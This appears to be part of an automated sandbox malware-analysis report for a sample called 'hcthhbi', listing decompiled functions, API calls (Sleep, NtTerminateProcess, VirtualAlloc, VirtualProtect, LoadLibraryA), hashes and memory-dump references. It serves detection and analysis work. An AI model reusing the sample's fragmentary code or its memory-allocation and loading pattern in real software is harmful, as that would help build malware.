Function 00401807 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 24%

			E00401807(signed int __edx, void* __edi, void* __esi) {
				void* _t9;
				void* _t10;
				void* _t12;
				void* _t14;
				intOrPtr* _t15;
				intOrPtr _t18;
				void* _t21;
				void* _t25;
				intOrPtr* _t27;
				signed char _t30;
				void* _t32;

				_t23 = __esi;
				_t21 = __edi;
				_t20 = __edx |  *(_t25 + 0x7b);
				_t30 = __edx |  *(_t25 + 0x7b);
				L00401118(_t9, _t14, 0x61, __esi, _t25, _t30);
				_t15 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t4 = _t25 - 4; // 0x1b68f34d
				_t10 = _t4;
				_push(_t10);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t15); // executed
				L00401360(); // executed
				_t31 = _t10;
				if(_t10 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t10);
					_push(_t15); // executed
					E00401432(_t15, _t20, _t21, _t23, _t32); // executed
				}
				 *_t15(0xffffffff, 0); // executed
				_t12 = 0x181b;
				_push(0x61);
				_t18 =  *_t27;
				L00401118(_t12, _t15, _t18, _t23, _t25, _t31);
				return _t12;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401823
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040184B

Memory Dump Source

Source File: 0000000D.00000002.382438227.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_hcthhbi.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: fa61b3bfe6e1efcc42a3172324d87a3747898b17389843dd474e8030b106d628
Instruction ID: d1e85a843a3bf15b3ffbd62fd2fe31d474754e63a526ee7ed21e8696c92682af
Opcode Fuzzy Hash: fa61b3bfe6e1efcc42a3172324d87a3747898b17389843dd474e8030b106d628
Instruction Fuzzy Hash: 2FF04F33204208FBDB007BA18C42EAD3729AB45754F20C537BA13790F2D679CA12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1B0 Relevance: 22.6, APIs: 15, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_check_managed_app.LIBCMTD ref: 0040A22C
__heap_init.LIBCMTD ref: 0040A236

Part of subcall function 004148F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040A23B,00000001), ref: 00414906

_fast_error_exit.LIBCMTD ref: 0040A244

Part of subcall function 0040A390: __FF_MSGBANNER.LIBCMTD ref: 0040A39E
Part of subcall function 0040A390: __NMSG_WRITE.LIBCMTD ref: 0040A3A7
Part of subcall function 0040A390: ___crtExitProcess.LIBCMTD ref: 0040A3B4

__mtinit.LIBCMTD ref: 0040A24C
_fast_error_exit.LIBCMTD ref: 0040A257
__RTC_Initialize.LIBCMTD ref: 0040A269
__amsg_exit.LIBCMTD ref: 0040A280
___crtGetEnvironmentStringsW.LIBCMTD ref: 0040A292
___wsetargv.LIBCMTD ref: 0040A29C
__amsg_exit.LIBCMTD ref: 0040A2A7
__wsetenvp.LIBCMTD ref: 0040A2AF
__amsg_exit.LIBCMTD ref: 0040A2BA
__cinit.LIBCMTD ref: 0040A2C4
__amsg_exit.LIBCMTD ref: 0040A2D9
__wwincmdln.LIBCMTD ref: 0040A2E1

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 107975891-0
Opcode ID: 272870e4d19c1bf85681b7abbf57ebcc6f131eb25805d94ca0531674ec928549
Instruction ID: 450b732e2b9114f1f527be54288a7872bfad2b2da338752ff4d5799d0543e86e
Opcode Fuzzy Hash: 272870e4d19c1bf85681b7abbf57ebcc6f131eb25805d94ca0531674ec928549
Instruction Fuzzy Hash: AF41A7B1E003089BDB10EBF2AC42B9E76B4AB54718F10413FE915B72C2E77D95518B9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A225 Relevance: 22.6, APIs: 15, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_check_managed_app.LIBCMTD ref: 0040A22C
__heap_init.LIBCMTD ref: 0040A236

Part of subcall function 004148F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040A23B,00000001), ref: 00414906

_fast_error_exit.LIBCMTD ref: 0040A244

Part of subcall function 0040A390: __FF_MSGBANNER.LIBCMTD ref: 0040A39E
Part of subcall function 0040A390: __NMSG_WRITE.LIBCMTD ref: 0040A3A7
Part of subcall function 0040A390: ___crtExitProcess.LIBCMTD ref: 0040A3B4

__mtinit.LIBCMTD ref: 0040A24C
_fast_error_exit.LIBCMTD ref: 0040A257
__RTC_Initialize.LIBCMTD ref: 0040A269
__amsg_exit.LIBCMTD ref: 0040A280
___crtGetEnvironmentStringsW.LIBCMTD ref: 0040A292
___wsetargv.LIBCMTD ref: 0040A29C
__amsg_exit.LIBCMTD ref: 0040A2A7
__wsetenvp.LIBCMTD ref: 0040A2AF
__amsg_exit.LIBCMTD ref: 0040A2BA
__cinit.LIBCMTD ref: 0040A2C4
__amsg_exit.LIBCMTD ref: 0040A2D9
__wwincmdln.LIBCMTD ref: 0040A2E1

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 107975891-0
Opcode ID: 002a1133fc2b2b890052d7194be57757f7404e523265611f7d27079dde27a561
Instruction ID: 7b563e03f9839307d37471739d09da52e36f4287aad92d161d43c72ba5477245
Opcode Fuzzy Hash: 002a1133fc2b2b890052d7194be57757f7404e523265611f7d27079dde27a561
Instruction Fuzzy Hash: 3F3145F5E403089AEB10FBF2A84279E7260AB5070CF10417FE9157A2C3F67995518A9B

Uniqueness

Uniqueness Score: -1.00%

Function 00425234 Relevance: 17.2, APIs: 11, Instructions: 689
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vswprintf.LIBCMTD ref: 00425259

Part of subcall function 00409310: __vsprintf_l.LIBCMTD ref: 00409323

_wprintf.LIBCMTD ref: 00425267

Part of subcall function 004095D0: __errno.LIBCMTD ref: 00409638
Part of subcall function 004095D0: __invalid_parameter.LIBCMTD ref: 00409656

Part of subcall function 00424700: __wremove.LIBCMTD ref: 00424709

_puts.LIBCMTD ref: 00425276

Part of subcall function 00409E30: __errno.LIBCMTD ref: 00409E9F
Part of subcall function 00409E30: __invalid_parameter.LIBCMTD ref: 00409EBD

_realloc.LIBCMTD ref: 00425293

Part of subcall function 00409E00: __realloc_dbg.LIBCMTD ref: 00409E14

_realloc.LIBCMTD ref: 0042529A

Part of subcall function 00409570: __nh_malloc_dbg.LIBCMTD ref: 00409584

_realloc.LIBCMTD ref: 004252B8
_malloc.LIBCMTD ref: 004252BE

Part of subcall function 004095A0: __nh_malloc_dbg.LIBCMTD ref: 004095B6

_ferror.LIBCMTD ref: 004252C7

Part of subcall function 00409D80: __errno.LIBCMTD ref: 00409DBC
Part of subcall function 00409D80: __invalid_parameter.LIBCMTD ref: 00409DDA

_wctomb_s.LIBCMTD ref: 004252D1
__wcstoi64_l.LIBCMTD ref: 004252DA

Part of subcall function 00409C60: strtoxl.LIBCMTD ref: 00409C77

Part of subcall function 00409530: __wcstoi64.LIBCMTD ref: 0040953D

VirtualProtect.KERNELBASE(00000040,0040A315,?,?,?,?,0040A315), ref: 00425845

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __errno__invalid_parameter_realloc$__nh_malloc_dbg$ProtectVirtual__realloc_dbg__vsprintf_l__vswprintf__wcstoi64__wcstoi64_l__wremove_ferror_malloc_puts_wctomb_s_wprintfstrtoxl
String ID:
API String ID: 2721630819-0
Opcode ID: 1c6d2cc978b886943a7379dbea215e1493315876cf010c28f08f4717cb5a734f
Instruction ID: 262d938b3f2657f6b2729647e496189a92effcfd73030ebb47c606ffad63313f
Opcode Fuzzy Hash: 1c6d2cc978b886943a7379dbea215e1493315876cf010c28f08f4717cb5a734f
Instruction Fuzzy Hash: 9D12FD76402665BBC321ABA2AE4CDDF7F6CEF4A355B004429F249A1071DB384645CBFE

Uniqueness

Uniqueness Score: -1.00%

Function 004A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004A024D

Strings

cess, xrefs: 004A018D
kernel32.dll, xrefs: 004A008F, 004A0095

Memory Dump Source

Source File: 0000000D.00000002.382634254.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4a0000_hcthhbi.jbxd

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: e8808fda1f18410e8add9b7d654e39f1dace8b15439fa6e8a781bb971e8400d6
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 74527874A01229DFDB64CF58C984BA8BBB1BF09304F1480DAE90DAB351DB34AE95DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7D7 Relevance: 7.8, APIs: 5, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CrtCheckMemory.LIBCMTD ref: 0040A7FA
__heap_alloc_base.LIBCMTD ref: 0040A981
_memset.LIBCMT ref: 0040AAC9
_memset.LIBCMT ref: 0040AAE6
_memset.LIBCMT ref: 0040AB01

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: _memset$CheckMemory__heap_alloc_base
String ID:
API String ID: 4254127243-0
Opcode ID: 11eca94a8210f7604d88c04e653745cf2f4ac7acd2143cfb64189b18e176aca7
Instruction ID: 8003a8bbdeb607fcfd29952dfd3ff738216c5421a97bed0ec34fcd63fd707b77
Opcode Fuzzy Hash: 11eca94a8210f7604d88c04e653745cf2f4ac7acd2143cfb64189b18e176aca7
Instruction Fuzzy Hash: B0A17CB1A003089BDB24DF44D885BAA77F1FB88314F20816AE6157B3D1D379AD51CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413710 Relevance: 6.3, APIs: 4, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__nh_malloc_dbg.LIBCMTD ref: 0041379B

Part of subcall function 0040AC10: __errno.LIBCMTD ref: 0040AC4E
Part of subcall function 0040AC10: __errno.LIBCMTD ref: 0040AC57

__nh_malloc_dbg.LIBCMTD ref: 004138C7

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __errno__nh_malloc_dbg
String ID:
API String ID: 3832883334-0
Opcode ID: 793defc74cc45d5d8457490f5a72f75f574c83ee9fcdd8e837b8dc5dae5b7d4a
Instruction ID: 061f960c3c56bc4dce60459519cbd0593be2b9e81a6d0b496bea9f962261da1e
Opcode Fuzzy Hash: 793defc74cc45d5d8457490f5a72f75f574c83ee9fcdd8e837b8dc5dae5b7d4a
Instruction Fuzzy Hash: A2E13874E04248CFDB24CFA8C884BADBBB1BF49315F24825ED4656B392C734A986CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB4E Relevance: 4.6, APIs: 3, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__errno.LIBCMTD ref: 0040AB8C
__invalid_parameter.LIBCMTD ref: 0040ABAD
_memset.LIBCMT ref: 0040ABF9

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __errno__invalid_parameter_memset
String ID:
API String ID: 2676528542-0
Opcode ID: 37f8fe0bcb31b3883c75da82c39e24722da4a38c9a7c88ba761914a44d406125
Instruction ID: 2d848b4623ee339f532b0a9df94e392e645202c2593e86f426ce9e794cc7a4fd
Opcode Fuzzy Hash: 37f8fe0bcb31b3883c75da82c39e24722da4a38c9a7c88ba761914a44d406125
Instruction Fuzzy Hash: 2C1186B1A40204BBDB04DF99CC42F9F7375AB54714F10C56AFA08BB2D1E778EA508759

Uniqueness

Uniqueness Score: -1.00%

Function 0040A73F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

QQ, xrefs: 0040A739

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID:
String ID: QQ
API String ID: 0-3460843698
Opcode ID: 75285a33f3e3a8226227495b54544be31729fa98091c7b21b9d872baf7ad745d
Instruction ID: b8a05fa9faf6205259e42587776440811784b13b78a99f35adb91e39540faf13
Opcode Fuzzy Hash: 75285a33f3e3a8226227495b54544be31729fa98091c7b21b9d872baf7ad745d
Instruction Fuzzy Hash: 4C011DB5A00209EBDB04DF68D940B9B73B4AB48304F10C16AFC059B280D33CDA62DB97

Uniqueness

Uniqueness Score: -1.00%

Function 004A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,004A0223,?,?), ref: 004A0E19
SetErrorMode.KERNELBASE(00000000,?,?,004A0223,?,?), ref: 004A0E1E

Memory Dump Source

Source File: 0000000D.00000002.382634254.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4a0000_hcthhbi.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4a69a7ed93f9a29727daf5d7a921b2a81f6fc96308f2a7e4260770afe9c2796a
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: F8D0123114512877DB002A94DC09BCE7B1CDF09B62F008411FB0DDD180C774994046E9

Uniqueness

Uniqueness Score: -1.00%

Function 00424F84 Relevance: 1.7, APIs: 1, Instructions: 204
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(0043C908,?,00425859,?,?,?,?,0040A315), ref: 00425145

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1c8093f970db0c7b47a6f918467a1ea0a2059fc68439062a2676e089865b2bd9
Instruction ID: d5c22196e6c86787fc6187b0217c9cf31e173426e2d09062d4b128ef03e1c2a9
Opcode Fuzzy Hash: 1c8093f970db0c7b47a6f918467a1ea0a2059fc68439062a2676e089865b2bd9
Instruction Fuzzy Hash: D5710FB690025CFFD7019BA4ED88EAE7B7CFB08349F04546AF242B2161D7795E448B39

Uniqueness

Uniqueness Score: -1.00%

Function 00413784 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__nh_malloc_dbg.LIBCMTD ref: 0041379B

Part of subcall function 0040AC10: __errno.LIBCMTD ref: 0040AC4E
Part of subcall function 0040AC10: __errno.LIBCMTD ref: 0040AC57

__nh_malloc_dbg.LIBCMTD ref: 004138C7

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __errno__nh_malloc_dbg
String ID:
API String ID: 3832883334-0
Opcode ID: 34d6c818ea2fe7f6eb22eff2ff5ec1cc226b4d9611d433e3dacdf37c4d1b4bc2
Instruction ID: 1f670b468b00d4af42eef1d2518bac94037d84d9ccaa06d3adbf7d70b26c640e
Opcode Fuzzy Hash: 34d6c818ea2fe7f6eb22eff2ff5ec1cc226b4d9611d433e3dacdf37c4d1b4bc2
Instruction Fuzzy Hash: B4E020F1F883049AE7309E65580B758B320E740735F20876FD235371C2D77904404F09

Uniqueness

Uniqueness Score: -1.00%

Function 00411230 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 00411237

Part of subcall function 00411160: __crt_wait_module_handle.LIBCMTD ref: 004111AC
Part of subcall function 00411160: RtlEncodePointer.NTDLL(?), ref: 004111E7

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: EncodePointer__crt_wait_module_handle__encode_pointer
String ID:
API String ID: 2010845264-0
Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction ID: 09228d863bb85d535e186be7d3ba10737ef20bba413071e9007e4ba5bde40c4c
Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction Fuzzy Hash: 8DA0127244420C33D00021833803B03750C43C0678F080021F70D051422883A8508097

Uniqueness

Uniqueness Score: -1.00%

Function 0040A190 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMTD ref: 0040A195

Part of subcall function 0040A1B0: _check_managed_app.LIBCMTD ref: 0040A22C
Part of subcall function 0040A1B0: __heap_init.LIBCMTD ref: 0040A236
Part of subcall function 0040A1B0: _fast_error_exit.LIBCMTD ref: 0040A244
Part of subcall function 0040A1B0: __mtinit.LIBCMTD ref: 0040A24C
Part of subcall function 0040A1B0: _fast_error_exit.LIBCMTD ref: 0040A257
Part of subcall function 0040A1B0: __RTC_Initialize.LIBCMTD ref: 0040A269
Part of subcall function 0040A1B0: __amsg_exit.LIBCMTD ref: 0040A280
Part of subcall function 0040A1B0: ___crtGetEnvironmentStringsW.LIBCMTD ref: 0040A292
Part of subcall function 0040A1B0: ___wsetargv.LIBCMTD ref: 0040A29C
Part of subcall function 0040A1B0: __amsg_exit.LIBCMTD ref: 0040A2A7
Part of subcall function 0040A1B0: __wsetenvp.LIBCMTD ref: 0040A2AF
Part of subcall function 0040A1B0: __amsg_exit.LIBCMTD ref: 0040A2BA
Part of subcall function 0040A1B0: __cinit.LIBCMTD ref: 0040A2C4
Part of subcall function 0040A1B0: __amsg_exit.LIBCMTD ref: 0040A2D9
Part of subcall function 0040A1B0: __wwincmdln.LIBCMTD ref: 0040A2E1

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$EnvironmentInitializeStrings___crt___security_init_cookie___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 1121526160-0
Opcode ID: 98989cdd7d29ee53ab50e6002a0618e3ff689f374e6eb608bae79b142b6f8e86
Instruction ID: c299c375e01da09e6c6c5d30e23f0e2f60812c71b290b268a86586838b04dc32
Opcode Fuzzy Hash: 98989cdd7d29ee53ab50e6002a0618e3ff689f374e6eb608bae79b142b6f8e86
Instruction Fuzzy Hash: BAA0223200830C02000033EB200380B3A0E08C032CF88002BBA0C0A2030C2CBCA000AF

Uniqueness

Uniqueness Score: -1.00%

Function 00424713 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,004255FE,?,?,?,?,0040A315,00400000), ref: 0042471B

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 14d80848cfb73261ec2c603f215e5016d321cdbd42351cf64f18514759d56cad
Instruction ID: e1373a8cda5d02e5e31bd4588887f7f1e2c4502a10a285b5590f57bb0ca19892
Opcode Fuzzy Hash: 14d80848cfb73261ec2c603f215e5016d321cdbd42351cf64f18514759d56cad
Instruction Fuzzy Hash: D1B0127D0061C1CBE7000FA0ED047003B70A308302F004431E508415F4D77100409F1D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00419D3E Relevance: 58.2, APIs: 32, Strings: 1, Instructions: 431COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 00419D82
_wcscat_s.LIBCMTD ref: 00419F9A

Part of subcall function 00417FB0: __errno.LIBCMTD ref: 00418004
Part of subcall function 00417FB0: __invalid_parameter.LIBCMTD ref: 00418022

__invoke_watson_if_error.LIBCMTD ref: 00419FA3

Part of subcall function 0040D750: __invoke_watson.LIBCMTD ref: 0040D771

_wcscat_s.LIBCMTD ref: 00419FD2

Part of subcall function 00417FB0: _memset.LIBCMT ref: 0041808B
Part of subcall function 00417FB0: __errno.LIBCMTD ref: 004180C9
Part of subcall function 00417FB0: __invalid_parameter.LIBCMTD ref: 004180E7

__invoke_watson_if_error.LIBCMTD ref: 00419FDB
__errno.LIBCMTD ref: 00419FF7
__errno.LIBCMTD ref: 0041A004
__errno.LIBCMTD ref: 0041A065
__invoke_watson_if_oneof.LIBCMTD ref: 0041A06D
__errno.LIBCMTD ref: 0041A075
_wcscpy_s.LIBCMTD ref: 0041A0B2
__invoke_watson_if_error.LIBCMTD ref: 0041A0BB
__invoke_watson_if_oneof.LIBCMTD ref: 0041A15E
_wcscpy_s.LIBCMTD ref: 0041A196
__invoke_watson_if_error.LIBCMTD ref: 0041A19F
__itow_s.LIBCMTD ref: 00419D79

Part of subcall function 00420610: _xtow_s@20.LIBCMTD ref: 0042063B

__errno.LIBCMTD ref: 00419E08
__errno.LIBCMTD ref: 00419E15
__strftime_l.LIBCMTD ref: 00419E39
__errno.LIBCMTD ref: 00419E6A
__invoke_watson_if_oneof.LIBCMTD ref: 00419E72
__errno.LIBCMTD ref: 00419E7A
_wcscpy_s.LIBCMTD ref: 00419EB7
__invoke_watson_if_error.LIBCMTD ref: 00419EC0
_wcscpy_s.LIBCMTD ref: 00419F13
__invoke_watson_if_error.LIBCMTD ref: 00419F1C
_wcscat_s.LIBCMTD ref: 00419F4D
__invoke_watson_if_error.LIBCMTD ref: 00419F56

Strings

hhS@, xrefs: 00419F2B

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __errno$__invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$__invoke_watson__itow_s__strftime_l_memset_xtow_s@20
String ID: hhS@
API String ID: 3381563063-2119751023
Opcode ID: 80b1f1f9ef0165c2a03c8708ec8e409da3a59c342dca85cfa7940f235414c6d9
Instruction ID: d27af07320d1eb642590504ffb9d02af422ede3df7889ce0abf490f02814720b
Opcode Fuzzy Hash: 80b1f1f9ef0165c2a03c8708ec8e409da3a59c342dca85cfa7940f235414c6d9
Instruction Fuzzy Hash: D402D2B1A40714ABDB20EF50CC4ABDF7374AB44706F1080AAF608762C1D7B99AD4CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1A8 Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 221COMMON

Download Yara Rule

APIs

_wcscpy_s.LIBCMTD ref: 0040F1CF

Part of subcall function 0041B1C0: __errno.LIBCMTD ref: 0041B214
Part of subcall function 0041B1C0: __invalid_parameter.LIBCMTD ref: 0041B232

__invoke_watson_if_error.LIBCMTD ref: 0040F1D8
_wcslen.LIBCMTD ref: 0040F1ED
_wcslen.LIBCMTD ref: 0040F1FE
_memcpy_s.LIBCMTD ref: 0040F249
__invoke_watson_if_error.LIBCMTD ref: 0040F252

Part of subcall function 0040D750: __invoke_watson.LIBCMTD ref: 0040D771

_wcslen.LIBCMTD ref: 0040F264
_wcslen.LIBCMTD ref: 0040F275
__errno.LIBCMTD ref: 0040F287
__errno.LIBCMTD ref: 0040F294

Strings

T9@, xrefs: 0040F3E8
}*j, xrefs: 0040F47F
hp7@, xrefs: 0040F4FB
}8j, xrefs: 0040F4BC
h9@, xrefs: 0040F42F, 0040F435
x9@, xrefs: 0040F421, 0040F427

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: _wcslen$__errno$__invoke_watson_if_error$__invalid_parameter__invoke_watson_memcpy_s_wcscpy_s
String ID: T9@$h9@$hp7@$x9@$}*j$}8j
API String ID: 1901159194-2627948063
Opcode ID: 69e32b321e248410000e7823130aea819443181b8e358e7ce34e22efff76e140
Instruction ID: c989a44e0b005258df185deb6b351e4735925c0c1cc0b0e9ba5036a14e9ba7d7
Opcode Fuzzy Hash: 69e32b321e248410000e7823130aea819443181b8e358e7ce34e22efff76e140
Instruction Fuzzy Hash: 9D918FB1A00218FBDB24EF94CC49BAE7774AB48305F1081BAA905762C1D3799AD9CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1F9 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
_get_int64_arg.LIBCMTD ref: 0041C2B0
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477
_write_multi_char.LIBCMTD ref: 0041C57E
_write_multi_char.LIBCMTD ref: 0041C5C5
_wctomb_s.LIBCMTD ref: 0041C642

Strings

9, xrefs: 0041C488
-, xrefs: 0041C51E

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s
String ID: -$9
API String ID: 2113545778-1631151375
Opcode ID: 2d1ca70876759fbd93998b0827d82937963de4f2786de7028e337a2b57bedfd8
Instruction ID: cd65fcbc2bc2221da77d8da28465a990ab50a61e976fa800fbad99ea58a0f3b0
Opcode Fuzzy Hash: 2d1ca70876759fbd93998b0827d82937963de4f2786de7028e337a2b57bedfd8
Instruction Fuzzy Hash: AFF147B1D05229DFDB24CF58CC99BEEB7B5BB44304F14819AE419AB281D7389E80CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004233FB Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
_get_int64_arg.LIBCMTD ref: 004234B8
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682
_write_multi_char.LIBCMTD ref: 0042379B
_write_string.LIBCMTD ref: 004237B6
_write_multi_char.LIBCMTD ref: 004237E2
__mbtowc_l.LIBCMTD ref: 00423851

Strings

9, xrefs: 00423693

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
String ID: 9
